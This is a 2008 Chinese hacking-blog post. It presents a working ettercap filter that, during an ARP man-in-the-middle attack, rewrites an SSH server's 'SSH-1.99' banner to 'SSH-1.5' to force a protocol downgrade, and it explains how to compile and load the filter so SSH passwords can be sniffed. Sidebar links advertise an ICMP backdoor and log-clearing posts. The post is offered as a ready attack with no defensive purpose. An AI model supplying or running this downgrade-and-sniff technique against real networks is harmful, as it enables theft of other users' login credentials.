-
2008-07-20
ettercap 的ssh filter - [H4ck Tech]
版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
http://xi4oyu.blogbus.com/logs/25087593.html
默认从网上下的ettercap是不能嗅探ssh1的密码的,即使被嗅探的服务器被配置成了protcol 2,1也一样。 自己做了个实验arp mitm后,开启sniffer nc 到服务端看返回SSH-1.99,啊哈,原来是没有降下来的缘故。当时还在loveshell群里面和baoz讨论了一段时间,后来村长一句话,自己写个脚本不就OK了。花了一会研究了下filter的写法,写了个ssh将ssh-1.99降到ssh-1.5的filter,这下能嗅了,哈哈。
======================装B的分割线========================
if (tcp.src ==22 && search(DATA.data,"SSH-1.99")){
replace("SSH-1.99","SSH-1.5");
}
======================装B的分割线========================
就一句话,etterfilter 编译下,安装上去 搞定,害我弄得了这么长时间,郁闷
随机文章:
准备写篇文章,关于linux下的exploitation的 2007-12-10debase64 attachment 2007-11-21arp-fucker is coming soon 2007-09-10ddb-sfe: Nice icmp backdoor 2007-06-09研究utmp嘿嘿,贴个MAN ing....将日志清除的更彻底点,嘻嘻 2007-05-14
收藏到:Del.icio.us
Xi4oyu 's Soul
黑客是一种精神状态
评论